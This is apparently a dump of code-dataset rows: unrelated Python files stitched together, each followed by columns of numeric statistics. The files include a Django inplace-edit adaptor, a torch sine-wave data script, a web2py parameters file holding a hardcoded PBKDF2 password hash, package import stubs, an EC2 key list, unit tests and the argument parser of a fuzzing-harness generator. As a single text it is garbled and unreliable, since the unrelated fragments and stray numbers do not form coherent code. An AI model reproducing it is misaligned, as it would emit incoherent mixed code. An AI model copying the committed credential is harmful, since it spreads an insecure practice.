    def treatment_height(self, height, font_size, width=None):
        # An explicitly configured height wins; otherwise derive from font size.
        effective_height = height if 'height' in self.config else font_size
        return "%spx" % (effective_height * self.MULTIPLIER_HEIGHT)

    def treatment_width(self, width, font_size, height=None):
        return "%spx" % (width + self.INCREASE_WIDTH)

    def render_value(self, field_name=None):
        rendered = super(MyAdaptor, self).render_value(field_name)
        if isinstance(rendered, string):
            return rendered
        return unicode(rendered)

    def get_form_class(self):
        # The form has to be here,
        return modelform_factory(self.model, form=HabitatManageForm, fields='__all__')

    # and request.user has to be injected here,
    def get_form(self):
        form_class = self.get_form_class()
        return form_class(instance=self.obj, initial=self.initial, prefix=id(form_class), user=self.request.user, )

    def get_value_editor(self, value):
        editor_value = super(MyAdaptor, self).get_value_editor(value)
        return editor_value and editor_value.pk

    def save(self, value):
        setattr(self.obj, "%s_id" % self.field_name, value)
        self.obj.save()
# Re-declaration of the compatibility aliases; re-running it is harmless
# because it assigns the same values again.
if sys.version_info[0] == 2:
    string = basestring  # noqa: F821 -- only defined on Python 2
else:
    unicode = string = str
class ScheduleChange(BaseAdaptorField):
    """Inplace-edit adaptor for rescheduling: saving forces ``end`` to equal
    ``start`` before writing the edited field.

    Unlike ``MyAdaptor`` it relies on the base class's default form
    handling (the custom-form overrides were dead, commented-out code and
    have been removed).
    """

    MULTIPLIER_HEIGHT = 1.75
    INCREASE_WIDTH = 40

    @property
    def name(self):
        return 'schedule_change'

    def treatment_height(self, height, font_size, width=None):
        # An explicitly configured height wins; otherwise derive from font size.
        if 'height' in self.config:
            effective_height = height
        else:
            effective_height = font_size
        return "%spx" % (effective_height * self.MULTIPLIER_HEIGHT)

    def treatment_width(self, width, font_size, height=None):
        return "%spx" % (width + self.INCREASE_WIDTH)

    def render_value(self, field_name=None):
        value = super(ScheduleChange, self).render_value(field_name)
        if not isinstance(value, string):
            value = unicode(value)
        return value

    def save(self, value):
        # Collapse the entry: end is forced to the start time before the
        # edited field is written.  NOTE(review): presumably intentional
        # for this adaptor -- confirm against the calling view.
        self.obj.end = self.obj.start
        setattr(self.obj, "%s_id" % self.field_name, value)
        self.obj.save()
| 29.811321
| 115
| 0.666772
| 404
| 3,160
| 5.032178
| 0.200495
| 0.04427
| 0.027546
| 0.01574
| 0.869651
| 0.869651
| 0.869651
| 0.869651
| 0.869651
| 0.869651
| 0
| 0.00578
| 0.233544
| 3,160
| 105
| 116
| 30.095238
| 0.833609
| 0.167405
| 0
| 0.716418
| 0
| 0
| 0.026356
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.19403
| false
| 0
| 0.059701
| 0.074627
| 0.507463
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
d10f1e89d18c59178e7ed8cd796a746292704f3d
| 423
|
py
|
Python
|
test.py
|
Miguel-Hombrados/GPK-pytorch
|
ef2addc5b40fa94a9ff1d8b650ee02d9044790c7
|
[
"MIT"
] | null | null | null |
test.py
|
Miguel-Hombrados/GPK-pytorch
|
ef2addc5b40fa94a9ff1d8b650ee02d9044790c7
|
[
"MIT"
] | null | null | null |
test.py
|
Miguel-Hombrados/GPK-pytorch
|
ef2addc5b40fa94a9ff1d8b650ee02d9044790c7
|
[
"MIT"
] | null | null | null |
import torch
import math
# Synthetic 1-D regression data: noisy sine/cosine waves sampled on [0, 1].
train_x = torch.linspace(0, 1, 100)

_TWO_PI = 2 * math.pi


def _noisy_wave(wave_fn, xs):
    """Evaluate ``wave_fn`` over one period of ``xs``, plus Gaussian noise
    scaled by 0.2 (one fresh ``torch.randn`` draw per call)."""
    return wave_fn(xs * _TWO_PI) + torch.randn(xs.size()) * 0.2


# Shape (100, 2): the two targets stacked along the last dimension.
train_y = torch.stack([
    _noisy_wave(torch.sin, train_x),
    _noisy_wave(torch.cos, train_x),
], -1)
# Shape (2, 100): same construction with fresh noise, stacked along dim 0.
train_z = torch.stack([
    _noisy_wave(torch.sin, train_x),
    _noisy_wave(torch.cos, train_x),
])
| 35.25
| 75
| 0.617021
| 76
| 423
| 3.289474
| 0.236842
| 0.216
| 0.112
| 0.176
| 0.768
| 0.768
| 0.768
| 0.768
| 0.768
| 0.768
| 0
| 0.050992
| 0.165485
| 423
| 12
| 76
| 35.25
| 0.657224
| 0
| 0
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.181818
| 0
| 0.181818
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d14126134f11a0144b5b3faf9ca9199d584fb2e9
| 92
|
py
|
Python
|
parameters_8000.py
|
lightcoder127/Web2py
|
d604816b487aaf758075805cffdb89f45dea906e
|
[
"BSD-3-Clause"
] | 2
|
2017-02-02T00:31:48.000Z
|
2017-08-08T22:36:25.000Z
|
parameters_8000.py
|
lightcoder127/Web2py
|
d604816b487aaf758075805cffdb89f45dea906e
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
lightcoder127/Web2py
|
d604816b487aaf758075805cffdb89f45dea906e
|
[
"BSD-3-Clause"
] | null | null | null |
# NOTE(review): hardcoded credential hash — the literal appears to encode a
# PBKDF2-SHA512 digest (1000 iterations, 20-byte key, salt$digest). Even a
# hashed password committed to source control should be rotated and moved
# to an untracked secrets store.
password="pbkdf2(1000,20,sha512)$bb0be0e1cc77c848$41955b75c2598e32eda3b9fd624e20c5dac4ceb6"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.450549
| 0.01087
| 92
| 1
| 92
| 92
| 0.450549
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
0f35332ecad36b0d997e94c938259733018e6d5b
| 894
|
py
|
Python
|
venv/lib/python3.8/site-packages/keras/api/_v2/keras/applications/efficientnet/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | 1
|
2021-05-24T10:08:51.000Z
|
2021-05-24T10:08:51.000Z
|
venv/lib/python3.8/site-packages/keras/api/_v2/keras/applications/efficientnet/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
venv/lib/python3.8/site-packages/keras/api/_v2/keras/applications/efficientnet/__init__.py
|
JIANG-CX/data_labeling
|
8d2470bbb537dfc09ed2f7027ed8ee7de6447248
|
[
"MIT"
] | null | null | null |
# This file is MACHINE GENERATED! Do not edit.
# Generated by: tensorflow/python/tools/api/generator/create_python_api.py script.
"""Public API for tf.keras.applications.efficientnet namespace.
"""
from __future__ import print_function as _print_function
import sys as _sys
from keras.applications.efficientnet import EfficientNetB0
from keras.applications.efficientnet import EfficientNetB1
from keras.applications.efficientnet import EfficientNetB2
from keras.applications.efficientnet import EfficientNetB3
from keras.applications.efficientnet import EfficientNetB4
from keras.applications.efficientnet import EfficientNetB5
from keras.applications.efficientnet import EfficientNetB6
from keras.applications.efficientnet import EfficientNetB7
from keras.applications.efficientnet import decode_predictions
from keras.applications.efficientnet import preprocess_input
del _print_function
| 40.636364
| 82
| 0.868009
| 105
| 894
| 7.257143
| 0.419048
| 0.245407
| 0.418635
| 0.433071
| 0.511811
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00978
| 0.085011
| 894
| 21
| 83
| 42.571429
| 0.92176
| 0.209172
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.923077
| 0
| 0.923077
| 0.153846
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0f5a1fa6940f5cb51fa0c48520552b382e1b4168
| 175
|
py
|
Python
|
elichika/elichika/parser/__init__.py
|
disktnk/chainer-compiler
|
5cfd027b40ea6e4abf73eb42be70b4fba74d1cde
|
[
"MIT"
] | null | null | null |
elichika/elichika/parser/__init__.py
|
disktnk/chainer-compiler
|
5cfd027b40ea6e4abf73eb42be70b4fba74d1cde
|
[
"MIT"
] | null | null | null |
elichika/elichika/parser/__init__.py
|
disktnk/chainer-compiler
|
5cfd027b40ea6e4abf73eb42be70b4fba74d1cde
|
[
"MIT"
] | null | null | null |
from elichika.parser import core
from elichika.parser import nodes
from elichika.parser import values
from elichika.parser import functions
from elichika.parser import utils
| 25
| 37
| 0.851429
| 25
| 175
| 5.96
| 0.36
| 0.402685
| 0.604027
| 0.805369
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12
| 175
| 6
| 38
| 29.166667
| 0.967532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
7e977a3942db35bd6425a1a916fca8d54c8baf90
| 179
|
py
|
Python
|
crypto_engine/__init__.py
|
Francis-T/UBI_IoT_encryption_test
|
574fe2e9aedb2640ded26411bddbdd6d234479e8
|
[
"MIT"
] | null | null | null |
crypto_engine/__init__.py
|
Francis-T/UBI_IoT_encryption_test
|
574fe2e9aedb2640ded26411bddbdd6d234479e8
|
[
"MIT"
] | null | null | null |
crypto_engine/__init__.py
|
Francis-T/UBI_IoT_encryption_test
|
574fe2e9aedb2640ded26411bddbdd6d234479e8
|
[
"MIT"
] | null | null | null |
from crypto_engine.base_crypto_engine import CryptoEngine
from crypto_engine.fhe_crypto_engine import FHECryptoEngine
from crypto_engine.rsa_crypto_engine import RSACryptoEngine
| 35.8
| 59
| 0.910615
| 24
| 179
| 6.416667
| 0.416667
| 0.467532
| 0.311688
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.072626
| 179
| 4
| 60
| 44.75
| 0.927711
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7eacd61cd1614663e2824856179f254a07d08384
| 77
|
py
|
Python
|
froide_legalaction/models/__init__.py
|
okfde/froide-legalaction
|
d1831e09760d2c7c1d1b2927dbb9bbe6af3e40b0
|
[
"MIT"
] | 2
|
2018-06-17T18:56:54.000Z
|
2021-11-30T10:01:52.000Z
|
froide_legalaction/models/__init__.py
|
okfde/froide-legalaction
|
d1831e09760d2c7c1d1b2927dbb9bbe6af3e40b0
|
[
"MIT"
] | 3
|
2016-12-12T15:41:43.000Z
|
2021-06-18T13:03:35.000Z
|
froide_legalaction/models/__init__.py
|
okfde/froide-legalaction
|
d1831e09760d2c7c1d1b2927dbb9bbe6af3e40b0
|
[
"MIT"
] | 1
|
2021-11-30T10:01:56.000Z
|
2021-11-30T10:01:56.000Z
|
from .lawsuit_models import * # NOQA
from .decision_models import * # NOQA
| 25.666667
| 38
| 0.74026
| 10
| 77
| 5.5
| 0.6
| 0.436364
| 0.581818
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 77
| 2
| 39
| 38.5
| 0.873016
| 0.116883
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7ec88a5f4c349a26d19775518de765d6d377af5e
| 103
|
py
|
Python
|
characters/Jotaro.py
|
dretcm/Git_Taller_Grupo11
|
b09119dd057d80fd848f4f14fc38d3fe475d061f
|
[
"Apache-2.0"
] | null | null | null |
characters/Jotaro.py
|
dretcm/Git_Taller_Grupo11
|
b09119dd057d80fd848f4f14fc38d3fe475d061f
|
[
"Apache-2.0"
] | null | null | null |
characters/Jotaro.py
|
dretcm/Git_Taller_Grupo11
|
b09119dd057d80fd848f4f14fc38d3fe475d061f
|
[
"Apache-2.0"
] | null | null | null |
class Jotaro:
    """Character that announces himself with his signature battle cry."""

    def SayName(self):
        """Print the catchphrase to stdout (returns None)."""
        # Runtime string reproduced byte-for-byte from the original.
        battle_cry = "Jotaro: ora ora ora ora ora ora ora ora ....!!!!"
        print(battle_cry)
| 25.75
| 65
| 0.582524
| 15
| 103
| 4
| 0.466667
| 0.7
| 0.9
| 1
| 0.4
| 0.4
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0.252427
| 103
| 3
| 66
| 34.333333
| 0.779221
| 0
| 0
| 0
| 0
| 0
| 0.466019
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0.333333
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
7d111ce509f434773f2b25bd894bdbf90f8d2970
| 74
|
py
|
Python
|
src/archs/segmentation/__init__.py
|
hendraet/IIC
|
a5bab915eda133b0ecfd42eaacd60c7b26807cb6
|
[
"MIT"
] | 767
|
2019-03-28T00:22:53.000Z
|
2022-03-31T09:27:01.000Z
|
src/archs/segmentation/__init__.py
|
hendraet/IIC
|
a5bab915eda133b0ecfd42eaacd60c7b26807cb6
|
[
"MIT"
] | 113
|
2019-03-30T20:44:58.000Z
|
2022-03-22T04:46:55.000Z
|
src/archs/segmentation/__init__.py
|
hendraet/IIC
|
a5bab915eda133b0ecfd42eaacd60c7b26807cb6
|
[
"MIT"
] | 209
|
2019-03-28T16:06:04.000Z
|
2022-03-29T15:08:47.000Z
|
from baselines import *
from net10a import *
from net10a_twohead import *
| 18.5
| 28
| 0.797297
| 10
| 74
| 5.8
| 0.5
| 0.344828
| 0.551724
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 0.162162
| 74
| 3
| 29
| 24.666667
| 0.870968
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
7d192bc2cfedfe53591e43f262ecb5e94e45431b
| 1,437
|
py
|
Python
|
ec2_compare/internal/ec2keys.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/ec2keys.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | null | null | null |
ec2_compare/internal/ec2keys.py
|
weldpua2008/aws.ec2.compare
|
5149fc4c7cb42f4d7df1930ed8a06750155fe578
|
[
"Apache-2.0"
] | 1
|
2021-12-15T11:58:22.000Z
|
2021-12-15T11:58:22.000Z
|
from typing import List
def keys_dict() -> dict:
    """Return a static mapping of Python type name ('str', 'bool', 'list',
    'dict', 'int', 'float', 'other') to the EC2 instance-description keys
    that carry values of that type. The literal looks machine-generated;
    NOTE(review): some keys appear under both 'bool' and 'int'
    (e.g. HibernationSupported) — presumably intentional, verify upstream.
    """
    # pylint: disable=all
    return {'str': ['NetworkPerformance', 'InstanceType', 'EnaSupport', 'Hypervisor', 'EbsOptimizedSupport', 'EncryptionSupport'], 'bool': ['InstanceStorageSupported', 'CurrentGeneration', 'AutoRecoverySupported', 'Ipv6Supported', 'FreeTierEligible', 'HibernationSupported', 'BurstablePerformanceSupported', 'DedicatedHostsSupported', 'BareMetal'], 'list': ['SupportedStrategies', 'Accelerators', 'ValidCores', 'SupportedUsageClasses', 'Fpgas', 'Disks', 'Gpus', 'ValidThreadsPerCore', 'SupportedRootDeviceTypes', 'SupportedArchitectures'], 'dict': ['VCpuInfo', 'InferenceAcceleratorInfo', 'GpuInfo', 'EbsInfo', 'FpgaInfo', 'PlacementGroupInfo', 'ProcessorInfo', 'MemoryInfo', 'InstanceStorageInfo', 'NetworkInfo'], 'int': ['Ipv6AddressesPerInterface', 'DefaultThreadsPerCore', 'TotalGpuMemoryInMiB', 'MaximumNetworkInterfaces', 'HibernationSupported', 'TotalFpgaMemoryInMiB', 'TotalSizeInGB', 'DefaultVCpus', 'AutoRecoverySupported', 'DedicatedHostsSupported', 'CurrentGeneration', 'InstanceStorageSupported', 'Ipv6Supported', 'SizeInMiB', 'Ipv4AddressesPerInterface', 'DefaultCores', 'FreeTierEligible', 'BurstablePerformanceSupported', 'BareMetal'], 'float': ['SustainedClockSpeedInGhz'], 'other': []} # noqa: E501
def keys_structure(*arg, **kw) -> List:
    """Return the key names for the requested type buckets.

    With no positional arguments every bucket is included; otherwise only
    buckets whose name appears in ``arg``. ``kw`` is accepted for
    interface compatibility and ignored.
    """
    selected = []
    for bucket, names in keys_dict().items():
        if not arg or bucket in arg:
            selected.extend(names)
    return selected
| 110.538462
| 1,217
| 0.749478
| 102
| 1,437
| 10.529412
| 0.745098
| 0.013035
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.00536
| 0.091162
| 1,437
| 12
| 1,218
| 119.75
| 0.816998
| 0.020877
| 0
| 0
| 0
| 0
| 0.66144
| 0.287954
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.166667
| 0.333333
| 0.833333
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 8
|
7d27719ad0f0a76394a5cb96b2f82c5fae7b7e40
| 128
|
py
|
Python
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_2.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2019-04-28T07:48:50.000Z
|
2020-12-11T14:18:08.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/completion/heavyStarPropagation/lib/_pkg0/_pkg0_0/_pkg0_0_1/_pkg0_0_1_1/_pkg0_0_1_1_0/_mod0_0_1_1_0_2.py
|
Cyril-lamirand/intellij-community
|
60ab6c61b82fc761dd68363eca7d9d69663cfa39
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
name0_0_1_1_0_2_0 = None
name0_0_1_1_0_2_1 = None
name0_0_1_1_0_2_2 = None
name0_0_1_1_0_2_3 = None
name0_0_1_1_0_2_4 = None
| 14.222222
| 24
| 0.820313
| 40
| 128
| 1.875
| 0.175
| 0.4
| 0.466667
| 0.533333
| 0.88
| 0.88
| 0.746667
| 0
| 0
| 0
| 0
| 0.318182
| 0.140625
| 128
| 9
| 25
| 14.222222
| 0.363636
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
bc01a622d1fc4ab0931b0e15fdd053a08364ab06
| 725
|
py
|
Python
|
tests/test_provider_innovationnorway_git.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_innovationnorway_git.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_innovationnorway_git.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_innovationnorway_git.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:16:55 UTC)
def test_provider_import():
    # Smoke test: importing the generated provider module must not raise.
    import terrascript.provider.innovationnorway.git
def test_datasource_import():
    # Smoke test: the git_repository data source must be importable from
    # the generated namespace.
    from terrascript.data.innovationnorway.git import git_repository
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.innovationnorway.git
#
# t = terrascript.provider.innovationnorway.git.git()
# s = str(t)
#
# assert 'https://github.com/innovationnorway/terraform-provider-git' in s
# assert '0.1.3' in s
| 29
| 80
| 0.754483
| 95
| 725
| 5.642105
| 0.610526
| 0.177239
| 0.201493
| 0.212687
| 0.164179
| 0
| 0
| 0
| 0
| 0
| 0
| 0.024351
| 0.150345
| 725
| 24
| 81
| 30.208333
| 0.845779
| 0.704828
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.041667
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
70e1591c104189efb210c26d2869c0fc90c0241d
| 2,821
|
py
|
Python
|
unittests/set_cover_unittests.py
|
LagLukas/mscp
|
a71ea46eb572c32ffc5d2ebe23d5222fb4e9dca1
|
[
"Beerware"
] | null | null | null |
unittests/set_cover_unittests.py
|
LagLukas/mscp
|
a71ea46eb572c32ffc5d2ebe23d5222fb4e9dca1
|
[
"Beerware"
] | null | null | null |
unittests/set_cover_unittests.py
|
LagLukas/mscp
|
a71ea46eb572c32ffc5d2ebe23d5222fb4e9dca1
|
[
"Beerware"
] | null | null | null |
from source.set_cover import SetCover
from source.set_cover import Solution
import unittest
import numpy as np
class TestSetCover(unittest.TestCase):
    """Tests for SetCover/Solution on a small 3x4 coverage instance."""

    @staticmethod
    def _build_instance(solvable=True):
        """Return the 3x4 coverage matrix shared by every test.

        Rows are elements, columns are candidate sets:
            1 0 0 1
            1 1 0 0
            0 0 1 1
        With ``solvable=False`` the third row stays all-zero, so element 2
        cannot be covered by any set.
        """
        matrix = np.zeros((3, 4))
        matrix[0][0] = 1
        matrix[0][3] = 1
        matrix[1][1] = 1
        matrix[1][0] = 1
        if solvable:
            matrix[2][2] = 1
            matrix[2][3] = 1
        return matrix

    @staticmethod
    def _selection(*indices):
        """Return a length-3 selection vector with the given sets chosen."""
        vec = np.zeros(3)
        for idx in indices:
            vec[idx] = 1
        return vec

    def test_add_set(self):
        cover = SetCover(self._build_instance())
        partial = Solution(cover, self._selection(1))
        # Set 1 alone leaves elements uncovered; adding set 2 completes it.
        assert partial.is_feasible == False
        partial.add_set(2)
        assert partial.is_feasible == True

    def test_is_feasible(self):
        cover = SetCover(self._build_instance())
        complete = Solution(cover, self._selection(1, 2))
        assert complete.is_feasible_solution() == True

    def test_is_not_feasible(self):
        cover = SetCover(self._build_instance())
        partial = Solution(cover, self._selection(1))
        assert partial.is_feasible_solution() == False

    def test_problem_is_solveable(self):
        # Constructing SetCover on a coverable instance must not raise.
        raised = False
        try:
            SetCover(self._build_instance())
        except Exception as _:
            raised = True
        assert raised == False

    def test_problem_is_unsolveable(self):
        # An uncoverable instance is rejected at construction time.
        raised = False
        try:
            SetCover(self._build_instance(solvable=False))
        except Exception as _:
            raised = True
        assert raised == True
# Run the suite when this file is executed directly.
if __name__ == "__main__":
    unittest.main()
| 24.530435
| 58
| 0.495214
| 383
| 2,821
| 3.506527
| 0.112272
| 0.041698
| 0.033507
| 0.029784
| 0.857036
| 0.770663
| 0.770663
| 0.770663
| 0.770663
| 0.770663
| 0
| 0.096624
| 0.390996
| 2,821
| 114
| 59
| 24.745614
| 0.685099
| 0
| 0
| 0.733333
| 0
| 0
| 0.003346
| 0
| 0
| 0
| 0
| 0
| 0.08
| 1
| 0.066667
| false
| 0
| 0.053333
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
70e7dbb2209a3d6a80d8c40e21eb426c5c611e73
| 35,631
|
py
|
Python
|
harness.py
|
Microsvuln/autoharness
|
c016df996bdfc09ba14a7c63c03ce8a719498fb4
|
[
"MIT"
] | 254
|
2021-07-10T22:51:52.000Z
|
2022-03-05T03:47:10.000Z
|
harness.py
|
Microsvuln/autoharness
|
c016df996bdfc09ba14a7c63c03ce8a719498fb4
|
[
"MIT"
] | 3
|
2021-07-13T11:13:27.000Z
|
2022-01-03T06:16:40.000Z
|
harness.py
|
Microsvuln/autoharness
|
c016df996bdfc09ba14a7c63c03ce8a719498fb4
|
[
"MIT"
] | 21
|
2021-07-10T23:59:30.000Z
|
2022-02-17T02:28:53.000Z
|
import os
import argparse
import subprocess
import pandas as pd
import lief
from subprocess import DEVNULL, STDOUT
from ast import literal_eval
# Command-line interface: every flag below feeds the harness-generation
# pipeline further down this script.
parser = argparse.ArgumentParser(description="""\
A program to help you to automatically create fuzzing harnesses.
""")
# Required locations of the target program and its CodeQL artifacts.
parser.add_argument('-L', '--library', help = "Specify directory to program's libraries", required=True)
parser.add_argument('-C', '--ql', help = "Specify directory of codeql modules, database, and binary", required=True)
parser.add_argument('-D', '--database', help = "Specify Codeql database", required=True)
# Harness shape: "0" -> single-argument harnesses, "1" -> multi-argument.
parser.add_argument('-M', '--mode', help = "Specify 0 for 1 argument harnesses or 1 for multiple argument harnesses", required=True)
parser.add_argument('-O', '--output', help = "Output directory", required=True)
# Optional compiler configuration.
parser.add_argument('-F', '--flags', help = "Specify compiler flags (include)", required=False)
parser.add_argument('-X', '--headers', help = "Specify header files (comma seperated)", required=False)
parser.add_argument('-G', '--debug', help = "Specify 0/1 for disabling/enabling debug mode.", required=True)
parser.add_argument('-Y', '--detection', help = "Automatic header detection (0) or Function Definition (1).", required=True)
# Parses sys.argv at import time; argparse exits the process here if any
# required flag is missing.
args = parser.parse_args()
def rreplace(s, old, new, occurrence):
    """Replace the last `occurrence` occurrences of `old` in `s` with `new`.

    Mirrors str.replace but works from the right-hand end of the string;
    used below to trim the trailing ", " from generated argument lists.
    """
    segments = s.rsplit(old, occurrence)
    return new.join(segments)
